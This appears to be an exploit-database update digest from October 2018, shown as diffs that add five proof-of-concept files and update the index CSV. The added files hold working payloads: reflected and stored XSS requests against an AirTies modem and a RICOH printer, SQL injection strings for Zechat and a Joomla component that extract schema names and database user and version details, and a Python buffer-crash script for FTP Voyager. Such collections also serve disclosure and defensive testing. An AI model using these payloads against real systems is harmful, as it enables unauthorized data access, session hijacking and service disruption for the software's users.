DB: 2018-10-04

5 changes to exploits/shellcodes

FTP Voyager 16.2.0 - Denial of Service (PoC)

OPAC EasyWeb Five 5.7 - 'nome' SQL Injection
Zechat 1.5 - 'uname' SQL Injection
Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection
Airties AIR5342 1.0.0.18 - Cross-Site Scripting
RICOH MP C1803 JPN Printer - Cross-Site Scripting

exploits/hardware/webapps/45525.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Airties AIR5342 1.0.0.18 - Cross-Site Scripting
+# Date: 25-09-2018
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: [https://www.airties.com/]
+# Software [http://www.airties.com.tr/support/dcenter/]
+# Version: [1.0.0.18]
+# Affected products: AIR5342, AIR5343v2, AIR5443v2, AIR5453, AIR5442, AIR5750, AIR5650, AIR5021
+# Tested on: MacOS High Sierra / Linux Mint / Windows 10
+# CVE : CVE-2018-17593, CVE-2018-17590, CVE-2018-17591, CVE-2018-17588, CVE-2018-17587
+  
+# A cross site scripting vulnerability has been discovered in the AIR5342 modem of the AirTies manufacturer. 
+# AirTies Air 5342 devices have XSS via the top.html productboardtype parameter.  
+  
+# HTTP Requests :
+
+GET /top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Ismail%20Tasdelen%22);%3C/script%3E HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1

exploits/hardware/webapps/45526.txt

@@ -0,0 +1,31 @@
+# Exploit Title: RICOH MP C1803 JPN Printer - Cross-Site Scripting
+# Date: 2018-09-21 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.ricoh.com/
+# Hardware Link : https://www.ricoh.co.jp/mfp/mp_c/1803/
+# Software : RICOH Printer
+# Product Version:  MP C1803 JPN
+# Vulernability Type : Code Injection
+# Vulenrability : HTML Injection and Stored XSS
+# Affected Products: RICOH MP C1803 JPN, RICOH MP C307
+# CVE : CVE-2018-17310, CVE-2018-17313
+
+# On the RICOH MP C1803 JPN printer, HTML Injection and Stored XSS vulnerabilities have 
+# been discovered in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi.
+
+# HTTP POST Request :
+
+POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
+Host: Target
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/plain, */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://Target/web/entry/en/address/adrsList.cgi
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 209
+Cookie: risessionid=125831398474617; cookieOnOffChecker=on; wimsesid=911065987
+Connection: close
+
+mode=ADDUSER&step=BASE&wimToken=847703007&entryIndexIn=00002&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryReadNameIn=&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1

exploits/php/webapps/45523.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Zechat 1.5 - 'uname' SQL Injection
+# Exploit Author: Ihsan Sencan
+# Date: 2018-10-02
+# Dork: N/A
+# Vendor Homepage: https://bylancer.com/
+# Software Link: https://bylancer.com/products/zechat-php-script/index.php
+# Version: 1.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+
+https://Target/products/zechat-php-script/profile.php?uname=demo
+
+'+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229)--+-

exploits/php/webapps/45524.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection
+# Exploit Author: Ihsan Sencan
+# Dork: N/A
+# Date: 2018-10-03
+# Vendor Homepage: https://janguo.de/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/collection-factory/
+# Software Download: https://vd.janguo.de/attachments/download/191/pkg_jimtawl-2.2.8-current-r569.zip
+# Version: 2.2.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: NA
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jimtawl&view=user&task=user.edit&id=[SQL]
+
+' AND EXTRACTVALUE(66,CONCAT(0x5c,(SELECT (ELT(66=66,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))-- VerAyari

exploits/windows_x86/dos/45527.py

@@ -0,0 +1,25 @@
+# Exploit Title: FTP Voyager 16.2.0 - Denial of Service (PoC)
+# Author: Abdullah Alıç
+# Discovey Date: 2018-10-2
+# Vendor notified : 2018-10-2
+# Homepage: https://www.serv-u.com/
+# Software Link: https://www.serv-u.com/ftp-voyager
+# Tested Version: 16.2.0
+# Tested on OS: Windows XP Professional sp3 (ENG)
+# Steps to Reproduce: Run the python exploit script, it will create a new file
+# with the name "boom.txt". Copy the content of the new file "boom.txt". 
+# Start FTP Voyager click "site profiles" >>  New site >> Paste the content into field "IP:" field and hit enter! 
+  
+#!/usr/bin/python
+   
+buffer = "A" * 500
+
+payload = buffer
+try:
+    f=open("boom.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

files_exploits.csv

@@ -6137,6 +6137,7 @@ id,file,description,date,author,type,platform,port
 45489,exploits/multiple/dos/45489.html,"WebKit - 'WebCore::RenderTreeBuilder::removeAnonymousWrappersForInlineChildrenIfNeeded' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
 45493,exploits/windows_x86/dos/45493.py,"TransMac 12.2 - Denial of Service (PoC)",2018-09-26,"Gionathan Reale",dos,windows_x86,
 45494,exploits/windows_x86/dos/45494.py,"CrossFont 7.5 - Denial of Service (PoC)",2018-09-26,"Gionathan Reale",dos,windows_x86,
+45527,exploits/windows_x86/dos/45527.py,"FTP Voyager 16.2.0 - Denial of Service (PoC)",2018-10-03,"Abdullah Alıç",dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -40059,4 +40060,8 @@ id,file,description,date,author,type,platform,port
 45515,exploits/hardware/webapps/45515.txt,"Billion ADSL Router 400G 20151105641 - Cross-Site Scripting",2018-10-01,cakes,webapps,hardware,
 45518,exploits/php/webapps/45518.txt,"OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection",2018-10-02,"Dino Barlattani",webapps,php,
 45519,exploits/php/webapps/45519.txt,"Coaster CMS 5.5.0 - Cross-Site Scripting",2018-10-02,"Ismail Tasdelen",webapps,php,
-45521,exploits/php/webapps/45521.txt,"OPAC EasyWeb Five 5.7 - 'nome' SQL Injection",2018-10-02,"Ihsan Sencan",webapps,php,
+45521,exploits/php/webapps/45521.txt,"OPAC EasyWeb Five 5.7 - 'nome' SQL Injection",2018-10-02,"Ihsan Sencan",webapps,php,80
+45523,exploits/php/webapps/45523.txt,"Zechat 1.5 - 'uname' SQL Injection",2018-10-03,"Ihsan Sencan",webapps,php,
+45524,exploits/php/webapps/45524.txt,"Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection",2018-10-03,"Ihsan Sencan",webapps,php,80
+45525,exploits/hardware/webapps/45525.txt,"Airties AIR5342 1.0.0.18 - Cross-Site Scripting",2018-10-03,"Ismail Tasdelen",webapps,hardware,80
+45526,exploits/hardware/webapps/45526.txt,"RICOH MP C1803 JPN Printer - Cross-Site Scripting",2018-10-03,"Ismail Tasdelen",webapps,hardware,